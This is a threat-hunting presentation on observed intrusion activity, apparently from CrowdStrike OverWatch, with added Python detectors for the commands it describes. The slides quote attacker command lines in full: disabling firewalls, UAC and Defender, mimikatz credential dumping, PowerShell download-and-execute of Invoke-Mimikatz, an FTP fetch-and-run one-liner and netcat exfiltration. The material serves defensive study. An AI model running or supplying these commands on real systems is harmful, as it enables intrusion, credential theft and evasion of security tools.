From The Trenches: Observations of and Tracking Actor Activity

The document discusses observations from tracking actor activity and analyzing their tactics and techniques. It covers topics like collection bias, event enrichment using MITRE ATT&CK, examples of infrastructure modifications and credential access methods observed, and actor reactions to detection.

FROM THE TRENCHES:

OBSERVATIONS OF AND
TRACKING ACTOR ACTIVITY
H. CARVEY, SR RESEARCHER, OWSR-OUTREACH

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


INTRO
• whoami
• What do we do?
• Questions – Feel Free to Ask

2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


Collection Bias

Event Enrichment

MITRE ATT&CK

Things we see

Nuggets

COLLECTION BIAS
• OverWatch threat hunting against Falcon sensor telemetry
• Notification emails
• Customer responses
• Hands on keyboard activity
• NATION-STATE
• ECRIME
• TESTING

EVENT ENRICHMENT
• Vertical
• Geo-region
• Operating system(s) affected
• Attribution confidence
• MITRE ATT&CK

MITRE ATT&CK

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

THINGS WE SEE

• Actors modifying infrastructure
• Actor reactions
• Situational awareness

ACTOR MODIFYING INFRASTRUCTURE
Disable Windows Firewall
netsh advfirewall set allprofiles state off

Disable User Account Control
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Modify system binaries – compile new functions into ssh/sshd to record credentials, permit access via "magic key"

ACTOR MODIFYING INFRASTRUCTURE
Enable WDigest credential caching
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest /v UseLogonCredential /t REG_DWORD /d 1

Disable remote UAC restrictions
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
Value: LocalAccountTokenFilterPolicy, set to "1"

Disable machine account password changes on a workstation
HKLM\System\CurrentControlSet\Services\Netlogon\Parameters
Value: DisablePasswordChange, set to "1"
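
Added example (not from the deck) covering the two infrastructure slides above: a Python detector that parses "reg add" and netsh command lines from process-creation telemetry and names the hardening setting each one rolls back. The watchlist, regexes and sample command lines are constructed here; matching is on the key-path suffix and case-insensitive, so HKLM and HKEY_LOCAL_MACHINE spellings both hit, and a value being set back to its safe state (EnableLUA=1) is deliberately not flagged.

```python
import re

# Added example, not from the deck: flag 'reg add' and netsh command lines that
# roll back the hardening settings listed on the two "Actor modifying
# infrastructure" slides. Watchlist key: (key-path suffix, value name, data).
WEAKENING = {
    (r"policies\system", "enablelua", "0"): "UAC disabled",
    (r"policies\system", "localaccounttokenfilterpolicy", "1"): "remote UAC restrictions disabled",
    (r"securityproviders\wdigest", "uselogoncredential", "1"): "WDigest plaintext credential caching enabled",
    (r"netlogon\parameters", "disablepasswordchange", "1"): "machine account password changes disabled",
}
REG_ADD = re.compile(r'\breg(?:\.exe)?\s+add\s+(?P<key>"[^"]+"|\S+)(?P<rest>.*)', re.I)
SWITCH = {s: re.compile(r'/%s\s+(?P<arg>"[^"]*"|\S+)' % s, re.I) for s in ("v", "d")}
FIREWALL_OFF = re.compile(r"\bnetsh\s+advfirewall\s+set\s+(?P<profile>\w+)\s+state\s+off\b", re.I)

def _arg(match):
    return match.group("arg").strip('"').lower() if match else None

def parse_reg_add(cmdline):
    """Return (normalised key, value name, data) for a 'reg add' command, else None."""
    m = REG_ADD.search(cmdline)
    if not m:
        return None
    key = m.group("key").strip('"').lower().replace("hkey_local_machine", "hklm")
    rest = m.group("rest")
    return key, _arg(SWITCH["v"].search(rest)), _arg(SWITCH["d"].search(rest))

def classify(cmdline):
    """Describe the hardening rollback a command line performs, or None if it does none."""
    fw = FIREWALL_OFF.search(cmdline)
    if fw:
        return "Windows Firewall disabled (%s)" % fw.group("profile").lower()
    parsed = parse_reg_add(cmdline)
    if parsed is None:
        return None
    key, value, data = parsed
    for (suffix, name, bad), desc in WEAKENING.items():
        if key.endswith(suffix) and value == name and data == bad:
            return desc
    return None  # unknown key, or a value being restored rather than weakened

# Constructed process-creation telemetry modelled on the slides (not customer data).
SAMPLE = [
    r"netsh advfirewall set allprofiles state off",
    r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f",
    r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest /v UseLogonCredential /t REG_DWORD /d 1",
    r'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f',
    r"reg add HKLM\SOFTWARE\Contoso\App /v Installed /t REG_DWORD /d 1 /f",  # benign
    r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f",  # restores UAC
]
```

Running classify over SAMPLE flags the first four lines and stays silent on the last two.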

ACTOR REACTIONS
What happens when the Falcon sensor blocks an actor’s attempts?

We see the full range:
• Give up
• Troubleshoot
• Move to another system(s) and try again
• Disable security tools/AV

ACTOR REACTIONS
msiexec /x {GUID} /quiet /norestart
sc stop WinDefend
sc config "MsMpSvc" start= disabled
net stop MsMpSvc /y
taskkill /f /t /im MsMpEng.exe
powershell -w 1 -c (Get-WmiObject -Class Win32_Product -Filter "Name LIKE '%Defender%'").Uninstall()

SITUATIONAL AWARENESS
Limited situational awareness of EDR solutions
tasklist /svc | find "Cb"
cmd.exe /c "powershell Get-Service CylanceSVC | select Status,CanStop"

What we're NOT seeing, to a large extent:
• Prior knowledge of monitoring
• Knowledge or recon of monitoring prior to moving laterally
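
Added example (not from the deck) covering the "Actor reactions" and "Situational awareness" slides: a Python classifier that tags a command line with the action it takes against a security product (uninstall, disable, stop, kill, discover) and the product it names. The product token table and sample command lines are assumptions built only from the names on those slides; the msiexec line is left unattributed on purpose, because a product GUID has to be resolved on the host before it can be tied to a product.

```python
import re

# Added example, not from the deck: classify command lines that stop, disable,
# kill, uninstall or merely look for the security products named on the
# "Actor reactions" and "Situational awareness" slides. The product token
# table is an assumption limited to names that appear on those slides.
PRODUCT_TOKENS = {
    "defender": ("windefend", "msmpsvc", "msmpeng", "defender"),
    "carbon black": ("cb",),  # short token: only alert when paired with an action
    "cylance": ("cylancesvc",),
}
# First matching action wins, so destructive verbs are listed first.
ACTIONS = [
    ("uninstall", re.compile(r"\bmsiexec(?:\.exe)?\s+/x\b|\.uninstall\(\)", re.I)),
    ("disable", re.compile(r"\bsc(?:\.exe)?\s+config\b.*\bstart=\s*disabled\b", re.I)),
    ("stop", re.compile(r"\b(?:sc|net)(?:\.exe)?\s+stop\b", re.I)),
    ("kill", re.compile(r"\btaskkill(?:\.exe)?\b.*\s/im\s", re.I)),
    ("discover", re.compile(r"\btasklist\b|\bget-service\b|\bget-process\b|\bsc(?:\.exe)?\s+query\b", re.I)),
]

def products_named(cmdline):
    """Return the set of products whose service, process or display name appears."""
    words = set(re.findall(r"[a-z0-9_.-]+", cmdline.lower()))
    return {product for product, tokens in PRODUCT_TOKENS.items()
            if any(w == t or w.startswith(t + ".") for t in tokens for w in words)}

def classify(cmdline):
    """Return (action, products) for a command touching a security product, else None."""
    hits = products_named(cmdline)
    if not hits:
        # 'msiexec /x {GUID}' names no product; resolve the GUID against the
        # host's Uninstall registry key before attributing it.
        return None
    for action, pattern in ACTIONS:
        if pattern.search(cmdline):
            return action, hits
    return "reference", hits

# Constructed command lines modelled on the two slides (not customer data).
SAMPLE = [
    r"msiexec /x {GUID} /quiet /norestart",
    r"sc stop WinDefend",
    r'sc config "MsMpSvc" start= disabled',
    r"net stop MsMpSvc /y",
    r"taskkill /f /t /im MsMpEng.exe",
    r"""powershell -w 1 -c (Get-WmiObject -Class Win32_Product -Filter "Name LIKE '%Defender%'").Uninstall()""",
    r'tasklist /svc | find "Cb"',
    r'cmd.exe /c "powershell Get-Service CylanceSVC | select Status,CanStop"',
]
```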

NUGGETS – CREDENTIAL ACCESS
c:\ProgramData\p.exe "privilege::debug" "sekurlsa::logonpasswords"

powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit'

powershell IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/[REDACTED]');Invoke-Mimikatz -Command '"log" "token::elevate" "lsadump::sam"'

NUGGETS – CREDENTIAL ACCESS
Wmic /NODE:"[REDACTED]" /USER:"[REDACTED]" /password:[REDACTED] process call create "cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\file.txt) >> c:\windows\temp\temp.txt"

m.exe powerful -d sekurlsa logonpasswords > c:\windows\temp\file.txt

c:\windows\temp\MicrosoftUpdate.exe p::d s::l q > c:\windows\temp\mic.txt
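
Added example (not the deck's code) covering the two credential-access slides: the same mimikatz modules appear under renamed binaries (p.exe, mnl.exe, m.exe, MicrosoftUpdate.exe) with full, prefix-abbreviated (p::d) and subsequence-abbreviated (pr::dg, sl::lp) command names, so this Python matcher keys on the module::command argument shape instead of the file name. The module table is an assumption holding only the commands shown on the slides; a C++ compiler command line with std::vector is included to show why bare "::" is not enough.

```python
import re

# Added example, not from the deck: the credential-access slides show the same
# mimikatz modules run from renamed binaries (p.exe, mnl.exe, m.exe,
# MicrosoftUpdate.exe) with full, prefix-abbreviated (p::d) and
# subsequence-abbreviated (pr::dg, sl::lp) command names. This matcher keys on
# the module::command argument shape rather than the file name. The module
# table holds only the commands that appear on the slides.
MODULES = {
    "privilege": ("debug",),
    "sekurlsa": ("logonpasswords",),
    "lsadump": ("sam",),
    "token": ("elevate",),
}
PAIR = re.compile(r"\b([a-z]{1,12})::([a-z]{1,16})\b", re.I)

def is_subsequence(short, full):
    """True when every character of `short` occurs in `full`, in order (dg -> debug)."""
    it = iter(full)
    return all(ch in it for ch in short)

def expand(abbrev, candidates):
    """Resolve an exact, prefix or subsequence abbreviation to a known name, else None."""
    if abbrev in candidates:
        return abbrev
    for c in candidates:
        if c.startswith(abbrev):
            return c
    for c in candidates:
        if is_subsequence(abbrev, c):
            return c
    return None

def mimikatz_commands(cmdline):
    """Return the resolved module::command pairs a command line appears to invoke."""
    found = []
    for mod, cmd in PAIR.findall(cmdline):
        module = expand(mod.lower(), MODULES)
        command = expand(cmd.lower(), MODULES[module]) if module else None
        if command and "%s::%s" % (module, command) not in found:
            found.append("%s::%s" % (module, command))
    # Some renamed builds take space-separated module and command names
    # ("m.exe powerful -d sekurlsa logonpasswords"), so accept that shape too.
    words = re.findall(r"[a-z]+", cmdline.lower())
    for a, b in zip(words, words[1:]):
        if a in MODULES and b in MODULES[a] and "%s::%s" % (a, b) not in found:
            found.append("%s::%s" % (a, b))
    return found
```

Single-letter abbreviations such as p::d resolve by prefix, so the matcher is best used as an enrichment on an already suspicious process rather than as a stand-alone alert.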

NUGGETS
Windows
Use of SolarWinds Remote Management Tool, winagentrcl.exe
Use of AppInit_DLLs for persistence
Use of "msiexec /x" to uninstall products (AV) – Defense Evasion
Use of 'chcp' (1251, 850) to change cmd.exe code page
Linux
Enumerating Ruby after_cd hooks - Persistence

NUGGETS - EXFILTRATION
Windows Command Line
cmd.exe /c "@echo open AA.BB.CC[.]DD>>ftpget.txt&@echo <name>>>ftpget.txt&@echo hehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get f.exe>>ftpget.txt&@echo quit>>ftpget.txt&@ftp -s:ftpget.txt&@start f.exe"

Linux
Use of netcat (data exfil), e.g., "nc -nv < some_file.zip"
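
Added example (not from the deck) for the Windows command line above: a Python helper that replays a chained "@echo ...>>file & ... & ftp -s:file" one-liner and rebuilds the script file it assembles, so an analyst can read the FTP session (open, user, password, mode, transfer, quit) instead of decoding the one-liner by eye. The wrapper and echo regexes and the sample are constructed here; the sample keeps the slide's defanged address and placeholder user name as-is.

```python
import re

# Added example, not from the deck: rebuild the file(s) that a chained
# '@echo ...>>file & ... & ftp -s:file' one-liner like the one above writes,
# so the assembled FTP script can be read as the actor's ftp client saw it.
WRAPPER = re.compile(r'^\s*cmd(?:\.exe)?\s+/c\s+"?(?P<body>.*?)"?\s*$', re.I | re.S)
ECHO = re.compile(r"^@?echo\s?(?P<text>.*?)\s*(?P<op>>>|>)\s*(?P<file>[^>\s]+)$", re.I)

def reconstruct(cmdline):
    """Return ({filename: [lines written]}, [other commands run, in order])."""
    m = WRAPPER.match(cmdline)
    body = m.group("body") if m else cmdline
    files, commands = {}, []
    for segment in re.split(r"\s*&+\s*", body):   # '&' chains commands in cmd.exe
        segment = segment.strip()
        if not segment:
            continue
        e = ECHO.match(segment)
        if not e:
            commands.append(segment.lstrip("@"))
            continue
        name = e.group("file").lower()
        if e.group("op") == ">":                    # a single '>' truncates first
            files[name] = []
        files.setdefault(name, []).append(e.group("text"))
    return files, commands

def scripted_ftp_transfer(cmdline):
    """Return the FTP script lines when 'ftp -s:<file>' consumes a file that the
    same command line wrote; None when no such self-assembled script is run."""
    files, commands = reconstruct(cmdline)
    for command in commands:
        hit = re.match(r"ftp\s+(?:-\S+\s+)*-s:(\S+)", command, re.I)
        if hit and hit.group(1).lower() in files:
            return files[hit.group(1).lower()]
    return None

# Constructed from the command line on the slide (defanged address kept as-is).
SAMPLE = (
    'cmd.exe /c "@echo open AA.BB.CC[.]DD>>ftpget.txt&@echo <name>>>ftpget.txt'
    '&@echo hehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get f.exe>>ftpget.txt'
    '&@echo quit>>ftpget.txt&@ftp -s:ftpget.txt&@start f.exe"'
)
```

The "<name>>>ftpget.txt" segment is the awkward case: the parser must take the last ">>" as the redirect so the placeholder user name survives intact.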

NUGGETS
Time-to-Use
11 Feb – Jenkins vulnerability disclosed
12 Feb – observed actor attempting to download Metasploit module targeting Jenkins (just over 24 hrs)

QUESTIONS?

WE STOP
BREACHES